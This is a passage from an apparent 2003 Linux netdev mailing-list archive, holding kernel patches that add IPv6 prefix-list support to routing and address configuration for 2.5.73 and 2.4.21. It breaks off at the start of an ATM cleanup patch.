addrconf_dad_start(ift, 0); in6_ifa_put(ift); in6_dev_put(idev); out: @@ -1211,7 +1211,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; 
rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL, NULL); } @@ -1238,7 +1238,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1330,7 +1330,8 @@ } } else if (pinfo->onlink && valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, + RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1378,7 +1379,7 @@ } create = 1; - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1529,7 +1530,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1704,7 +1705,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1943,8 +1944,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1958,7 +1958,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1968,7 +1968,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, 
RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); @@ -2368,7 +2368,7 @@ ifm = NLMSG_DATA(nlh); ifm->ifa_family = AF_INET6; ifm->ifa_prefixlen = ifa->prefix_len; - ifm->ifa_flags = ifa->flags; + ifm->ifa_flags = ifa->flags | ifa->idev->if_flags; ifm->ifa_scope = RT_SCOPE_UNIVERSE; if (ifa->scope&IFA_HOST) ifm->ifa_scope = RT_SCOPE_HOST; diff -ruN linux-2.5.73.org/net/ipv6/ndisc.c test/linux-2.5.73/net/ipv6/ndisc.c --- linux-2.5.73.org/net/ipv6/ndisc.c 2003-06-22 11:32:56.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/ndisc.c 2003-07-14 15:06:14.000000000 -0700 @@ -1036,6 +1036,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? 
+ IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); diff -ruN linux-2.5.73.org/net/ipv6/route.c test/linux-2.5.73/net/ipv6/route.c --- linux-2.5.73.org/net/ipv6/route.c 2003-06-22 11:33:05.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/route.c 2003-07-16 10:42:01.000000000 -0700 @@ -1400,13 +1400,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1487,10 +1494,16 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1638,7 +1651,7 @@ &fl.fl6_dst, &fl.fl6_src, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1664,7 +1677,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; From krkumar@us.ibm.com Wed Jul 16 11:51:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 11:51:36 -0700 (PDT) Received: from e33.co.us.ibm.com (e33.co.us.ibm.com [32.97.110.131]) by oss.sgi.com (8.12.9/8.12.9) with 
SMTP id h6GIpNFl027506 for ; Wed, 16 Jul 2003 11:51:24 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e33.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6GIobj3222472; Wed, 16 Jul 2003 14:50:37 -0400 Received: from DYN318430.beaverton.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6GIoUMc222188; Wed, 16 Jul 2003 12:50:30 -0600 Date: Wed, 16 Jul 2003 11:49:11 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: kuznet@ms2.inr.ac.ru, , , Subject: Re: [PATCH 1/2] Prefix List against 2.5.73 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4111 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev Sorry, I had an extra structure in the previous patch which is not needed after taking Alexey's changes. Since the prefix list and the routing table are now returned *identically*, the extra structure in6_prefix_msg is removed. This is the correct patch for 2.5.73.
Thanks, - KK diff -ruN linux-2.5.73.org/include/linux/ipv6_route.h test/linux-2.5.73/include/linux/ipv6_route.h --- linux-2.5.73.org/include/linux/ipv6_route.h 2003-06-22 11:32:36.000000000 -0700 +++ test/linux-2.5.73/include/linux/ipv6_route.h 2003-07-15 10:38:31.000000000 -0700 @@ -16,6 +16,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h test/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ test/linux-2.5.73/include/linux/rtnetlink.h 2003-07-16 10:58:19.000000000 -0700 @@ -168,6 +168,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.5.73.org/include/net/if_inet6.h test/linux-2.5.73/include/net/if_inet6.h --- linux-2.5.73.org/include/net/if_inet6.h 2003-06-22 11:33:32.000000000 -0700 +++ test/linux-2.5.73/include/net/if_inet6.h 2003-07-16 09:55:25.000000000 -0700 @@ -17,7 +17,9 @@ #include -#define IF_RA_RCVD 0x20 +#define IF_RA_OTHERCONF 0x02 +#define IF_RA_MANAGED 0x04 +#define IF_RA_RCVD 0x08 #define IF_RS_SENT 0x10 #ifdef __KERNEL__ diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-16 11:01:10.000000000 -0700 @@ -129,7 +129,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); 
+static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -715,7 +715,7 @@ ift->prefered_lft = tmp_prefered_lft; ift->tstamp = ifp->tstamp; spin_unlock_bh(&ift->lock); - addrconf_dad_start(ift); + addrconf_dad_start(ift, 0); in6_ifa_put(ift); in6_dev_put(idev); out: @@ -1211,7 +1211,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL, NULL); } @@ -1238,7 +1238,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1330,7 +1330,8 @@ } } else if (pinfo->onlink && valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, + RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1378,7 +1379,7 @@ } create = 1; - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1529,7 +1530,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1704,7 +1705,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1943,8 +1944,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); 
+ rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1958,7 +1958,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1968,7 +1968,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); @@ -2368,7 +2368,7 @@ ifm = NLMSG_DATA(nlh); ifm->ifa_family = AF_INET6; ifm->ifa_prefixlen = ifa->prefix_len; - ifm->ifa_flags = ifa->flags; + ifm->ifa_flags = ifa->flags | ifa->idev->if_flags; ifm->ifa_scope = RT_SCOPE_UNIVERSE; if (ifa->scope&IFA_HOST) ifm->ifa_scope = RT_SCOPE_HOST; diff -ruN linux-2.5.73.org/net/ipv6/ndisc.c test/linux-2.5.73/net/ipv6/ndisc.c --- linux-2.5.73.org/net/ipv6/ndisc.c 2003-06-22 11:32:56.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/ndisc.c 2003-07-14 15:06:14.000000000 -0700 @@ -1036,6 +1036,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? 
+ IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); diff -ruN linux-2.5.73.org/net/ipv6/route.c test/linux-2.5.73/net/ipv6/route.c --- linux-2.5.73.org/net/ipv6/route.c 2003-06-22 11:33:05.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/route.c 2003-07-16 10:42:01.000000000 -0700 @@ -1400,13 +1400,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1487,10 +1494,16 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1638,7 +1651,7 @@ &fl.fl6_dst, &fl.fl6_src, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1664,7 +1677,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; From krkumar@us.ibm.com Wed Jul 16 11:52:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 11:52:47 -0700 (PDT) Received: from e5.ny.us.ibm.com (e5.ny.us.ibm.com [32.97.182.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP 
id h6GIqdFl027824 for ; Wed, 16 Jul 2003 11:52:40 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e5.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6GIps4X197346; Wed, 16 Jul 2003 14:51:54 -0400 Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6GIppq6129134; Wed, 16 Jul 2003 14:51:52 -0400 Date: Wed, 16 Jul 2003 11:50:26 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: kuznet@ms2.inr.ac.ru, , , Subject: [PATCH 2/2] Prefix List against 2.4.21 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4112 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev This is the same patch against 2.4.21 Thanks, - KK diff -ruN linux-2.4.21.org/include/linux/ipv6_route.h test/linux.2.4.21/include/linux/ipv6_route.h --- linux-2.4.21.org/include/linux/ipv6_route.h 1998-08-27 19:33:08.000000000 -0700 +++ test/linux.2.4.21/include/linux/ipv6_route.h 2003-07-16 10:58:57.000000000 -0700 @@ -25,6 +25,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.4.21.org/include/linux/rtnetlink.h test/linux.2.4.21/include/linux/rtnetlink.h --- linux-2.4.21.org/include/linux/rtnetlink.h 2002-11-28 15:53:15.000000000 -0800 +++ test/linux.2.4.21/include/linux/rtnetlink.h 2003-07-16 10:57:58.000000000 -0700 @@ -167,6 +167,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define 
RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ @@ -198,7 +199,7 @@ RTA_MULTIPATH, RTA_PROTOINFO, RTA_FLOW, - RTA_CACHEINFO + RTA_CACHEINFO, }; #define RTA_MAX RTA_CACHEINFO diff -ruN linux-2.4.21.org/include/net/if_inet6.h test/linux.2.4.21/include/net/if_inet6.h --- linux-2.4.21.org/include/net/if_inet6.h 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/include/net/if_inet6.h 2003-07-16 10:54:53.000000000 -0700 @@ -15,7 +15,9 @@ #ifndef _NET_IF_INET6_H #define _NET_IF_INET6_H -#define IF_RA_RCVD 0x20 +#define IF_RA_OTHERCONF 0x02 +#define IF_RA_MANAGED 0x04 +#define IF_RA_RCVD 0x08 #define IF_RS_SENT 0x10 #ifdef __KERNEL__ diff -ruN linux-2.4.21.org/net/ipv6/addrconf.c test/linux.2.4.21/net/ipv6/addrconf.c --- linux-2.4.21.org/net/ipv6/addrconf.c 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/net/ipv6/addrconf.c 2003-07-16 11:05:15.000000000 -0700 @@ -101,7 +101,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -889,7 +889,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL); } @@ -916,7 +916,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1008,7 +1008,8 @@ } } else if (pinfo->onlink && valid_lft) { 
addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, + RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1054,7 +1055,7 @@ return; } - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1166,7 +1167,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1341,7 +1342,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1578,8 +1579,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1593,7 +1593,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1603,7 +1603,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? 
: 1); @@ -1888,7 +1888,7 @@ ifm = NLMSG_DATA(nlh); ifm->ifa_family = AF_INET6; ifm->ifa_prefixlen = ifa->prefix_len; - ifm->ifa_flags = ifa->flags; + ifm->ifa_flags = ifa->flags | ifa->idev->if_flags; ifm->ifa_scope = RT_SCOPE_UNIVERSE; if (ifa->scope&IFA_HOST) ifm->ifa_scope = RT_SCOPE_HOST; diff -ruN linux-2.4.21.org/net/ipv6/ndisc.c test/linux.2.4.21/net/ipv6/ndisc.c --- linux-2.4.21.org/net/ipv6/ndisc.c 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/net/ipv6/ndisc.c 2003-07-14 15:09:28.000000000 -0700 @@ -940,6 +940,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); diff -ruN linux-2.4.21.org/net/ipv6/route.c test/linux.2.4.21/net/ipv6/route.c --- linux-2.4.21.org/net/ipv6/route.c 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/net/ipv6/route.c 2003-07-16 11:09:45.000000000 -0700 @@ -1516,13 +1516,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1603,10 +1610,16 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 
0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1757,7 +1770,7 @@ fl.nl_u.ip6_u.saddr, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1783,7 +1796,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; From chas@locutus.cmf.nrl.navy.mil Wed Jul 16 14:20:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 14:20:49 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GLKcFl002265 for ; Wed, 16 Jul 2003 14:20:39 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6GLKWsG023003; Wed, 16 Jul 2003 17:20:32 -0400 (EDT) Message-Id: <200307162120.h6GLKWsG023003@ginger.cmf.nrl.navy.mil> To: davem@redhat.com cc: netdev@oss.sgi.com Subject: [PATCH][ATM] minor cleanups for 2.5 Reply-To: chas3@users.sourceforge.net Date: Wed, 16 Jul 2003 17:18:04 -0400 From: chas williams X-Spam-Score: () hits=0.5 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4113 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev just some cleanup work for the 2.5 kernels. one biggish oopsy -- never checked the return code from atm_dev_lookup() in vcc_connect. found it last week, and someone else found it recently as well. 
the lec timers now use mod_timer() and go away with del_timer_sync() (and how does __inline__ work when it's the timer function?) [atm]: make sigd_sleep conditional with WAIT_FOR_DEMON # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1364 -> 1.1365 # net/atm/signaling.c 1.17 -> 1.18 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/21 chas@relax.cmf.nrl.navy.mil 1.1365 # signaling.c: # make sigd_sleep conditional with WAIT_FOR_DEMON # -------------------------------------------- # diff -Nru a/net/atm/signaling.c b/net/atm/signaling.c --- a/net/atm/signaling.c Mon Jun 23 09:45:13 2003 +++ b/net/atm/signaling.c Mon Jun 23 09:45:13 2003 @@ -31,7 +31,9 @@ struct atm_vcc *sigd = NULL; +#ifdef WAIT_FOR_DEMON static DECLARE_WAIT_QUEUE_HEAD(sigd_sleep); 